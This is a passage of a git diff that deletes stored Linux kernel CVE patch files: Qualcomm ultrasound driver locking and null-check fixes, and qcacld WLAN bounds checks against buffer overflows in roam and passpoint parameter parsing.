- retval = synaptics_rmi4_i2c_set_page(rmi4_data, addr);
- if (retval != PAGE_SELECT_LEN) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch
deleted file mode 100644
index 5651b6b3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index d535ccb..9270dbc 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -22,6 +22,7 @@
- #include
- #include
- #include
-+#include
- #include
- #include
- #include "q6usm.h"
-@@ -128,6 +129,8 @@ struct usf_type {
- uint16_t conflicting_event_filters;
- /* The requested buttons bitmap */
- uint16_t req_buttons_bitmap;
-+ /* Mutex for exclusive operations (all public APIs) */
-+ struct mutex mutex;
- };
-
- struct usf_input_dev_type {
-@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- int dir)
- {
- struct us_client *usc = usf_xx->usc;
-- struct us_port_data *port = &usc->port[dir];
-+ struct us_port_data *port;
- int rc = 0;
-
-+ if (usc == NULL) {
-+ pr_err("%s: usc is null\n",
-+ __func__);
-+ return -EFAULT;
-+ }
-+
-+ port = &usc->port[dir];
-+ if (port == NULL) {
-+ pr_err("%s: port is null\n",
-+ __func__);
-+ return -EFAULT;
-+ }
-+
- if (port->param_buf == NULL) {
- pr_err("%s: parameter buffer is null\n",
- __func__);
-@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
-
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+ unsigned int cmd,
-+ unsigned long arg)
- {
-+
- int rc = 0;
-- struct usf_type *usf = file->private_data;
- struct usf_xx_type *usf_xx = NULL;
-
- switch (cmd) {
-@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- release_xx(usf_xx);
-
- return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+ struct usf_type *usf = file->private_data;
-+ int rc = 0;
-+
-+ mutex_lock(&usf->mutex);
-+ rc = __usf_ioctl(usf, cmd, arg);
-+ mutex_unlock(&usf->mutex);
-+
-+ return rc;
- } /* usf_ioctl */
-
- #ifdef CONFIG_COMPAT
-@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
-
--static long usf_compat_ioctl(struct file *file,
-+static long __usf_compat_ioctl(struct usf_type *usf,
- unsigned int cmd,
- unsigned long arg)
- {
- int rc = 0;
-- struct usf_type *usf = file->private_data;
- struct usf_xx_type *usf_xx = NULL;
-
- switch (cmd) {
-@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file,
- case US_START_RX:
- case US_STOP_TX:
- case US_STOP_RX: {
-- return usf_ioctl(file, cmd, arg);
-+ return __usf_ioctl(usf, cmd, arg);
- }
-
- case US_SET_TX_INFO32: {
-@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file,
- release_xx(usf_xx);
-
- return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+ unsigned int cmd,
-+ unsigned long arg)
-+{
-+ struct usf_type *usf = file->private_data;
-+ int rc = 0;
-+
-+ mutex_lock(&usf->mutex);
-+ rc = __usf_compat_ioctl(usf, cmd, arg);
-+ mutex_unlock(&usf->mutex);
-+
-+ return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
-
-@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- struct usf_type *usf = file->private_data;
- int dir = OUT;
- struct usf_xx_type *usf_xx = &usf->usf_tx;
-+ int rc = 0;
-
-+ mutex_lock(&usf->mutex);
- if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- dir = IN;
- usf_xx = &usf->usf_rx;
- }
-+ rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+ mutex_unlock(&usf->mutex);
-
-- return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+ return rc;
- }
-
- static uint16_t add_opened_dev(int minor)
-@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file)
- usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
-
-+ mutex_init(&usf->mutex);
-+
- pr_debug("%s:usf in open\n", __func__);
- return 0;
- }
-@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file)
-
- pr_debug("%s: release entry\n", __func__);
-
-+ mutex_lock(&usf->mutex);
- usf_release_input(usf);
-
- usf_disable(&usf->usf_tx);
-@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file)
-
- s_opened_devs[usf->dev_ind] = 0;
-
-+ mutex_unlock(&usf->mutex);
-+ mutex_destroy(&usf->mutex);
- kfree(usf);
- pr_debug("%s: release exit\n", __func__);
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch
deleted file mode 100644
index ab99a331..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-From 831da5d113d214db6894e9fd0ce98762ee8a544a Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Tue, 6 Dec 2016 09:57:57 -0800
-Subject: [PATCH] Kconfig: msm: disable ultrasound driver
-
-Bug: 31906415
-Bug: 31906657
-Bug: 32553868
-Change-Id: Iab736a5d5622098c89c76dbe6b0b395652bbae57
-Signed-off-by: Nick Desaulniers
----
- sound/soc/msm/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/sound/soc/msm/Kconfig b/sound/soc/msm/Kconfig
-index 6eb168e4d10d5..2e6f642241ef3 100644
---- a/sound/soc/msm/Kconfig
-+++ b/sound/soc/msm/Kconfig
-@@ -267,7 +267,6 @@ config SND_SOC_MSM8994
- select SND_SOC_MSM_HDMI_CODEC_RX
- select QTI_PP
- select SND_SOC_CPE
-- select MSM_ULTRASOUND
- select SND_HWDEP
- help
- To add support for SoC audio on MSM8994.
diff --git a/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch
deleted file mode 100644
index 5651b6b3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index d535ccb..9270dbc 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -22,6 +22,7 @@
- #include
- #include
- #include
-+#include
- #include
- #include
- #include "q6usm.h"
-@@ -128,6 +129,8 @@ struct usf_type {
- uint16_t conflicting_event_filters;
- /* The requested buttons bitmap */
- uint16_t req_buttons_bitmap;
-+ /* Mutex for exclusive operations (all public APIs) */
-+ struct mutex mutex;
- };
-
- struct usf_input_dev_type {
-@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- int dir)
- {
- struct us_client *usc = usf_xx->usc;
-- struct us_port_data *port = &usc->port[dir];
-+ struct us_port_data *port;
- int rc = 0;
-
-+ if (usc == NULL) {
-+ pr_err("%s: usc is null\n",
-+ __func__);
-+ return -EFAULT;
-+ }
-+
-+ port = &usc->port[dir];
-+ if (port == NULL) {
-+ pr_err("%s: port is null\n",
-+ __func__);
-+ return -EFAULT;
-+ }
-+
- if (port->param_buf == NULL) {
- pr_err("%s: parameter buffer is null\n",
- __func__);
-@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
-
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+ unsigned int cmd,
-+ unsigned long arg)
- {
-+
- int rc = 0;
-- struct usf_type *usf = file->private_data;
- struct usf_xx_type *usf_xx = NULL;
-
- switch (cmd) {
-@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- release_xx(usf_xx);
-
- return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+ struct usf_type *usf = file->private_data;
-+ int rc = 0;
-+
-+ mutex_lock(&usf->mutex);
-+ rc = __usf_ioctl(usf, cmd, arg);
-+ mutex_unlock(&usf->mutex);
-+
-+ return rc;
- } /* usf_ioctl */
-
- #ifdef CONFIG_COMPAT
-@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
-
--static long usf_compat_ioctl(struct file *file,
-+static long __usf_compat_ioctl(struct usf_type *usf,
- unsigned int cmd,
- unsigned long arg)
- {
- int rc = 0;
-- struct usf_type *usf = file->private_data;
- struct usf_xx_type *usf_xx = NULL;
-
- switch (cmd) {
-@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file,
- case US_START_RX:
- case US_STOP_TX:
- case US_STOP_RX: {
-- return usf_ioctl(file, cmd, arg);
-+ return __usf_ioctl(usf, cmd, arg);
- }
-
- case US_SET_TX_INFO32: {
-@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file,
- release_xx(usf_xx);
-
- return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+ unsigned int cmd,
-+ unsigned long arg)
-+{
-+ struct usf_type *usf = file->private_data;
-+ int rc = 0;
-+
-+ mutex_lock(&usf->mutex);
-+ rc = __usf_compat_ioctl(usf, cmd, arg);
-+ mutex_unlock(&usf->mutex);
-+
-+ return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
-
-@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- struct usf_type *usf = file->private_data;
- int dir = OUT;
- struct usf_xx_type *usf_xx = &usf->usf_tx;
-+ int rc = 0;
-
-+ mutex_lock(&usf->mutex);
- if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- dir = IN;
- usf_xx = &usf->usf_rx;
- }
-+ rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+ mutex_unlock(&usf->mutex);
-
-- return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+ return rc;
- }
-
- static uint16_t add_opened_dev(int minor)
-@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file)
- usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
-
-+ mutex_init(&usf->mutex);
-+
- pr_debug("%s:usf in open\n", __func__);
- return 0;
- }
-@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file)
-
- pr_debug("%s: release entry\n", __func__);
-
-+ mutex_lock(&usf->mutex);
- usf_release_input(usf);
-
- usf_disable(&usf->usf_tx);
-@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file)
-
- s_opened_devs[usf->dev_ind] = 0;
-
-+ mutex_unlock(&usf->mutex);
-+ mutex_destroy(&usf->mutex);
- kfree(usf);
- pr_debug("%s: release exit\n", __func__);
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e7bc3db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
- QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
- QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer. In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
- allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
- expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
- the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- int rem, i;
- uint32_t buf_len = 0;
-+ uint32_t count;
- int ret;
-
- if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- hddLog(LOGE, FL("attr num of preferred bssid failed"));
- goto fail;
- }
-- roam_params.num_bssid_favored = nla_get_u32(
-+ count = nla_get_u32(
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+ if (count > MAX_BSSID_FAVORED) {
-+ hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+ count, MAX_BSSID_FAVORED);
-+ goto fail;
-+ }
- hddLog(VOS_TRACE_LEVEL_DEBUG,
-- FL("Num of Preferred BSSID (%d)"),
-- roam_params.num_bssid_favored);
-+ FL("Num of Preferred BSSID: %d"), count);
- i = 0;
- nla_for_each_nested(curr_attr,
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- rem) {
-+
-+ if (i == count) {
-+ hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+ break;
-+ }
-+
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- roam_params.bssid_favored_factor[i]);
- i++;
- }
-+ if (i < count)
-+ hddLog(LOGW,
-+ FL("Num Preferred BSSID %u less than expected %u"),
-+ i, count);
-+ roam_params.num_bssid_favored = i;
- sme_update_roam_params(pHddCtx->hHal, session_id,
- roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- goto fail;
- }
-- roam_params.num_bssid_avoid_list = nla_get_u32(
-+ count = nla_get_u32(
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+ if (count > MAX_BSSID_AVOID_LIST) {
-+ hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+ count, MAX_BSSID_AVOID_LIST);
-+ goto fail;
-+ }
- hddLog(VOS_TRACE_LEVEL_DEBUG,
-- FL("Num of blacklist BSSID (%d)"),
-- roam_params.num_bssid_avoid_list);
-+ FL("Num of blacklist BSSID: %d"), count);
- i = 0;
- nla_for_each_nested(curr_attr,
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- rem) {
-+
-+ if (i == count) {
-+ hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+ break;
-+ }
-+
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- roam_params.bssid_avoid_list[i]));
- i++;
- }
-+ if (i < count)
-+ hddLog(LOGW,
-+ FL("Num Blacklist BSSID %u less than expected %u"),
-+ i, count);
-+ roam_params.num_bssid_avoid_list = i;
- sme_update_roam_params(pHddCtx->hHal, session_id,
- roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e7bc3db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
- QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
- QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer. In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
- allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
- expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
- the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- int rem, i;
- uint32_t buf_len = 0;
-+ uint32_t count;
- int ret;
-
- if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- hddLog(LOGE, FL("attr num of preferred bssid failed"));
- goto fail;
- }
-- roam_params.num_bssid_favored = nla_get_u32(
-+ count = nla_get_u32(
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+ if (count > MAX_BSSID_FAVORED) {
-+ hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+ count, MAX_BSSID_FAVORED);
-+ goto fail;
-+ }
- hddLog(VOS_TRACE_LEVEL_DEBUG,
-- FL("Num of Preferred BSSID (%d)"),
-- roam_params.num_bssid_favored);
-+ FL("Num of Preferred BSSID: %d"), count);
- i = 0;
- nla_for_each_nested(curr_attr,
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- rem) {
-+
-+ if (i == count) {
-+ hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+ break;
-+ }
-+
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- roam_params.bssid_favored_factor[i]);
- i++;
- }
-+ if (i < count)
-+ hddLog(LOGW,
-+ FL("Num Preferred BSSID %u less than expected %u"),
-+ i, count);
-+ roam_params.num_bssid_favored = i;
- sme_update_roam_params(pHddCtx->hHal, session_id,
- roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- goto fail;
- }
-- roam_params.num_bssid_avoid_list = nla_get_u32(
-+ count = nla_get_u32(
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+ if (count > MAX_BSSID_AVOID_LIST) {
-+ hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+ count, MAX_BSSID_AVOID_LIST);
-+ goto fail;
-+ }
- hddLog(VOS_TRACE_LEVEL_DEBUG,
-- FL("Num of blacklist BSSID (%d)"),
-- roam_params.num_bssid_avoid_list);
-+ FL("Num of blacklist BSSID: %d"), count);
- i = 0;
- nla_for_each_nested(curr_attr,
- tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- rem) {
-+
-+ if (i == count) {
-+ hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+ break;
-+ }
-+
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- roam_params.bssid_avoid_list[i]));
- i++;
- }
-+ if (i < count)
-+ hddLog(LOGW,
-+ FL("Num Blacklist BSSID %u less than expected %u"),
-+ i, count);
-+ roam_params.num_bssid_avoid_list = i;
- sme_update_roam_params(pHddCtx->hHal, session_id,
- roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch
deleted file mode 100644
index 14c1d49c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 81b6b5538d3227ed4b925fcceedb109abb2a4c61 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Fri, 18 Nov 2016 11:35:01 -0800
-Subject: qcacld-2.0: Avoid overflow of passpoint network list
-
-Currently when processing a passpoint vendor command the "num
-networks" attribute is limit checked and if it exceeds a MAX value
-then the command is rejected. Otherwise this value is used to
-calculate the size of the buffer allocated to hold the internal
-representation of the request. However later when the network
-attributes are parsed there is no check to make sure the number of
-networks processed does not exceed the "num networks" used to allocate
-memory, and as a result a buffer overflow can occur. Address this
-issue by aborting the network parsing once "num networks" records have
-been parsed.
-
-Change-Id: I38d9f19b08b42fa9a850eb70a42920fbc3b99cf6
-CRs-Fixed: 1092059
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index a2ff8fe..54c5e54 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -5127,11 +5127,19 @@ static int hdd_extscan_passpoint_fill_network_list(
- struct nlattr *networks;
- int rem1, len;
- uint8_t index;
-+ uint32_t expected_networks;
-
-+ expected_networks = req_msg->num_networks;
- index = 0;
- nla_for_each_nested(networks,
- tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY],
- rem1) {
-+
-+ if (index == expected_networks) {
-+ hddLog(LOGW, FL("ignoring excess networks"));
-+ break;
-+ }
-+
- if (nla_parse(network,
- QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- nla_data(networks), nla_len(networks), NULL)) {
-@@ -5193,6 +5201,7 @@ static int hdd_extscan_passpoint_fill_network_list(
-
- index++;
- }
-+ req_msg->num_networks = index;
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch
deleted file mode 100644
index 58045e51..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From ff866a1e9a0f653252b5d5b7eb087374c5bad65d Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Fri, 18 Nov 2016 11:44:29 -0800
-Subject: qcacld-3.0: Avoid overflow of passpoint network list
-
-This is a qcacld-2.0 to qcacld-3.0 propagation.
-
-Currently when processing a passpoint vendor command the "num
-networks" attribute is limit checked and if it exceeds a MAX value
-then the command is rejected. Otherwise this value is used to
-calculate the size of the buffer allocated to hold the internal
-representation of the request. However later when the network
-attributes are parsed there is no check to make sure the number of
-networks processed does not exceed the "num networks" used to allocate
-memory, and as a result a buffer overflow can occur. Address this
-issue by aborting the network parsing once "num networks" records have
-been parsed.
-
-Change-Id: I38d9f19b08b42fa9a850eb70a42920fbc3b99cf6
-CRs-Fixed: 1092059
----
- core/hdd/src/wlan_hdd_ext_scan.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_ext_scan.c b/core/hdd/src/wlan_hdd_ext_scan.c
-index 6515bd4..44c574b 100644
---- a/core/hdd/src/wlan_hdd_ext_scan.c
-+++ b/core/hdd/src/wlan_hdd_ext_scan.c
-@@ -4080,11 +4080,19 @@ static int hdd_extscan_passpoint_fill_network_list(
- struct nlattr *networks;
- int rem1, len;
- uint8_t index;
-+ uint32_t expected_networks;
-
-+ expected_networks = req_msg->num_networks;
- index = 0;
- nla_for_each_nested(networks,
- tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY],
- rem1) {
-+
-+ if (index == expected_networks) {
-+ hdd_warn("ignoring excess networks");
-+ break;
-+ }
-+
- if (nla_parse(network,
- QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- nla_data(networks), nla_len(networks), NULL)) {
-@@ -4143,6 +4151,7 @@ static int hdd_extscan_passpoint_fill_network_list(
-
- index++;
- }
-+ req_msg->num_networks = index;
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch
deleted file mode 100644
index d78b4149..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch
+++ /dev/null
